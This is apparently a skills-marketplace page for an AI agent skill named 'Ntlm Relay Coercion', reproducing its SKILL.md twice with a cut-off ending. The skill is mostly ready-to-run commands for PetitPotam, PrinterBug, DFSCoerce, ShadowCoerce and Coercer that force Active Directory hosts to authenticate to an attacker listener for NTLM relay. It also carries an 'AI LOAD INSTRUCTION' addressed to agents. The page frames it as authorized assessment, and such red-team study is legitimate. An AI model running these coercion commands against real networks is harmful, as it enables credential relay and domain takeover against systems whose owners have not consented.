Ntlm Relay Coercion

Name: Ntlm Relay Coercion
Author: yaklang

yaklang/hack-skills

Compare NTLM authentication coercion methods and RPC-level details during authorized Active Directory security assessments.

Install

npx skills add https://github.com/yaklang/hack-skills --skill ntlm-relay-coercion

What is this skill?

Coercion methods matrix across PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, MSEven, and CheeseOunce
RPC interface, function, protocol (SMB 445), auth type, and credential requirements per method
PetitPotam MS-EFSR abuse notes including unauthenticated variants on misconfigured targets
Designed as a deep-dive companion after loading main NTLM relay SKILL.md fundamentals
Coercer tool usage and function-level comparison for assessment planning

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Coercion and relay technique selection belongs in Ship security work when hardening or ethically testing Windows/AD exposure before production trust boundaries fail. Security subphase covers offensive validation patterns, patch posture, and controlled abuse of legacy auth paths—not feature development.

Common Questions / FAQ

Is Ntlm Relay Coercion safe to install?

skills.sh reports 1 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.

SKILL.md

READMESKILL.md - Ntlm Relay Coercion

# Authentication Coercion Methods

> **AI LOAD INSTRUCTION**: Load this for detailed authentication coercion method comparison, RPC function-level details, and the Coercer tool usage. Assumes the main [SKILL.md](./SKILL.md) is already loaded for NTLM relay fundamentals.

---

## 1. COERCION METHODS MATRIX

| Method | RPC Interface | Function | Protocol | Auth Type | Requires Creds? | Target |
|---|---|---|---|---|---|---|
| **PetitPotam** | MS-EFSR (lsarpc) | EfsRpcOpenFileRaw + variants | SMB (445) | Machine account | No (unauthenticated on unpatched) | DC/Any |
| **PrinterBug** | MS-RPRN (spoolss) | RpcRemoteFindFirstPrinterChangeNotificationEx | SMB (445) | Machine account | Yes (domain user) | Any with Spooler |
| **DFSCoerce** | MS-DFSNM (netdfs) | NetrDfsRemoveStdRoot / NetrDfsAddStdRoot | SMB (445) | Machine account | Yes (domain user) | DC |
| **ShadowCoerce** | MS-FSRVP (fssagent) | IsPathShadowCopied / IsPathSupported | SMB (445) | Machine account | Yes (domain user) | File servers |
| **MSEven** | MS-EVEN (eventlog) | ElfrOpenBELW | SMB (445) | Machine account | Yes (domain user) | Any |
| **CheeseOunce** | MS-EVEN | OpenEventLogW (via named pipe) | SMB (445) | Machine account | Yes | Any |

---

## 2. PETITPOTAM — MS-EFSR ABUSE

### Unauthenticated (Pre-Patch / Misconfigured)

```bash
# Original PetitPotam — unauthenticated
PetitPotam.py LISTENER_IP TARGET_IP

# Specific EFS functions:
PetitPotam.py -method EfsRpcOpenFileRaw LISTENER_IP TARGET_IP
PetitPotam.py -method EfsRpcEncryptFileSrv LISTENER_IP TARGET_IP
```

### Authenticated

```bash
# With credentials (required on patched systems)
PetitPotam.py -u user -p password -d domain.com LISTENER_IP TARGET_IP
```

### EFS RPC Function Variants

| Function | Patched? | Notes |
|---|---|---|
| `EfsRpcOpenFileRaw` | Patched (Nov 2021) | Original PetitPotam function |
| `EfsRpcEncryptFileSrv` | Patched later | Alternative function |
| `EfsRpcDecryptFileSrv` | Partially patched | May still work |
| `EfsRpcQueryUsersOnFile` | Partially patched | May still work |
| `EfsRpcQueryRecoveryAgents` | Partially patched | May still work |
| `EfsRpcFileKeyInfo` | Varies | Check per target |

---

## 3. PRINTERBUG — MS-RPRN (SPOOLSAMPLE)

### Prerequisites
- Print Spooler service running on target
- Valid domain credentials

```bash
# SpoolSample (Windows)
SpoolSample.exe TARGET_HOST LISTENER_HOST

# printerbug.py (Impacket)
printerbug.py DOMAIN/user:password@TARGET_IP LISTENER_IP

# Dementor (Python)
python3 dementor.py -d domain.com -u user -p password LISTENER_IP TARGET_IP
```

### Check If Spooler Is Running

```bash
# From Linux
rpcdump.py DOMAIN/user:pass@TARGET_IP | grep -i spoolss

# CrackMapExec
crackmapexec smb TARGET_IP -u user -p pass -M spooler
```

---

## 4. DFSCOERCE — MS-DFSNM

```bash
# DFSCoerce
python3 dfscoerce.py -u user -p password -d domain.com LISTENER_IP TARGET_IP

# Specific functions
python3 dfscoerce.py -u user -p password -d domain.com \
  -method NetrDfsRemoveStdRoot LISTENER_IP TARGET_IP
```

### MS-DFSNM Functions

| Function | Notes |
|---|---|
| `NetrDfsRemoveStdRoot` | Primary coercion function |
| `NetrDfsAddStdRoot` | Alternative |

---

## 5. SHADOWCOERCE — MS-FSRVP

Exploits the File Server VSS Agent Service (requires the service to be running — common on file servers).

```bash
# ShadowCoerce
python3 shadowcoerce.py -u user -p password -d domain.com LISTENER_IP TARGET_IP
```

### MS-FSRVP Functions

| Function | Notes |
|---|---|
| `IsPathShadowCopied` | Primary function |
| `IsPathSupported` | Alternative function |
| `GetShareMapping` | Another variant |

---

## 6. COERCER — AUTOMATED DISCOVERY TOOL

[Coercer](https://github.com/p0dalirius/Coercer) automates testing all known coercion methods.

```bash
# Scan for available coercion methods on target
coercer scan -u user -p password -d domain.com -t TARGET_IP

# Coerce using all available methods
coercer coerce -u user -p password -d domain.com -t TARGET_IP -l LISTENER_IP

# Specific method

What is this skill?

Coercion methods matrix across PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, MSEven, and CheeseOunce

RPC interface, function, protocol (SMB 445), auth type, and credential requirements per method

PetitPotam MS-EFSR abuse notes including unauthenticated variants on misconfigured targets

Designed as a deep-dive companion after loading main NTLM relay SKILL.md fundamentals

Coercer tool usage and function-level comparison for assessment planning

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Ntlm Relay Coercion

# Authentication Coercion Methods

> **AI LOAD INSTRUCTION**: Load this for detailed authentication coercion method comparison, RPC function-level details, and the Coercer tool usage. Assumes the main [SKILL.md](./SKILL.md) is already loaded for NTLM relay fundamentals.

---

## 1. COERCION METHODS MATRIX

| Method | RPC Interface | Function | Protocol | Auth Type | Requires Creds? | Target |
|---|---|---|---|---|---|---|
| **PetitPotam** | MS-EFSR (lsarpc) | EfsRpcOpenFileRaw + variants | SMB (445) | Machine account | No (unauthenticated on unpatched) | DC/Any |
| **PrinterBug** | MS-RPRN (spoolss) | RpcRemoteFindFirstPrinterChangeNotificationEx | SMB (445) | Machine account | Yes (domain user) | Any with Spooler |
| **DFSCoerce** | MS-DFSNM (netdfs) | NetrDfsRemoveStdRoot / NetrDfsAddStdRoot | SMB (445) | Machine account | Yes (domain user) | DC |
| **ShadowCoerce** | MS-FSRVP (fssagent) | IsPathShadowCopied / IsPathSupported | SMB (445) | Machine account | Yes (domain user) | File servers |
| **MSEven** | MS-EVEN (eventlog) | ElfrOpenBELW | SMB (445) | Machine account | Yes (domain user) | Any |
| **CheeseOunce** | MS-EVEN | OpenEventLogW (via named pipe) | SMB (445) | Machine account | Yes | Any |

---

## 2. PETITPOTAM — MS-EFSR ABUSE

### Unauthenticated (Pre-Patch / Misconfigured)

```bash
# Original PetitPotam — unauthenticated
PetitPotam.py LISTENER_IP TARGET_IP

# Specific EFS functions:
PetitPotam.py -method EfsRpcOpenFileRaw LISTENER_IP TARGET_IP
PetitPotam.py -method EfsRpcEncryptFileSrv LISTENER_IP TARGET_IP
```

### Authenticated

```bash
# With credentials (required on patched systems)
PetitPotam.py -u user -p password -d domain.com LISTENER_IP TARGET_IP
```

### EFS RPC Function Variants

| Function | Patched? | Notes |
|---|---|---|
| `EfsRpcOpenFileRaw` | Patched (Nov 2021) | Original PetitPotam function |
| `EfsRpcEncryptFileSrv` | Patched later | Alternative function |
| `EfsRpcDecryptFileSrv` | Partially patched | May still work |
| `EfsRpcQueryUsersOnFile` | Partially patched | May still work |
| `EfsRpcQueryRecoveryAgents` | Partially patched | May still work |
| `EfsRpcFileKeyInfo` | Varies | Check per target |

---

## 3. PRINTERBUG — MS-RPRN (SPOOLSAMPLE)

### Prerequisites
- Print Spooler service running on target
- Valid domain credentials

```bash
# SpoolSample (Windows)
SpoolSample.exe TARGET_HOST LISTENER_HOST

# printerbug.py (Impacket)
printerbug.py DOMAIN/user:password@TARGET_IP LISTENER_IP

# Dementor (Python)
python3 dementor.py -d domain.com -u user -p password LISTENER_IP TARGET_IP
```

### Check If Spooler Is Running

```bash
# From Linux
rpcdump.py DOMAIN/user:pass@TARGET_IP | grep -i spoolss

# CrackMapExec
crackmapexec smb TARGET_IP -u user -p pass -M spooler
```

---

## 4. DFSCOERCE — MS-DFSNM

```bash
# DFSCoerce
python3 dfscoerce.py -u user -p password -d domain.com LISTENER_IP TARGET_IP

# Specific functions
python3 dfscoerce.py -u user -p password -d domain.com \
  -method NetrDfsRemoveStdRoot LISTENER_IP TARGET_IP
```

### MS-DFSNM Functions

| Function | Notes |
|---|---|
| `NetrDfsRemoveStdRoot` | Primary coercion function |
| `NetrDfsAddStdRoot` | Alternative |

---

## 5. SHADOWCOERCE — MS-FSRVP

Exploits the File Server VSS Agent Service (requires the service to be running — common on file servers).

```bash
# ShadowCoerce
python3 shadowcoerce.py -u user -p password -d domain.com LISTENER_IP TARGET_IP
```

### MS-FSRVP Functions

| Function | Notes |
|---|---|
| `IsPathShadowCopied` | Primary function |
| `IsPathSupported` | Alternative function |
| `GetShareMapping` | Another variant |

---

## 6. COERCER — AUTOMATED DISCOVERY TOOL

[Coercer](https://github.com/p0dalirius/Coercer) automates testing all known coercion methods.

```bash
# Scan for available coercion methods on target
coercer scan -u user -p password -d domain.com -t TARGET_IP

# Coerce using all available methods
coercer coerce -u user -p password -d domain.com -t TARGET_IP -l LISTENER_IP

# Specific method

Install

What is this skill?

Recommended Skills

Journey fit

Is Ntlm Relay Coercion safe to install?

SKILL.md

This week for builders

Install

What is this skill?

Recommended Skills

Journey fit

Is Ntlm Relay Coercion safe to install?

SKILL.md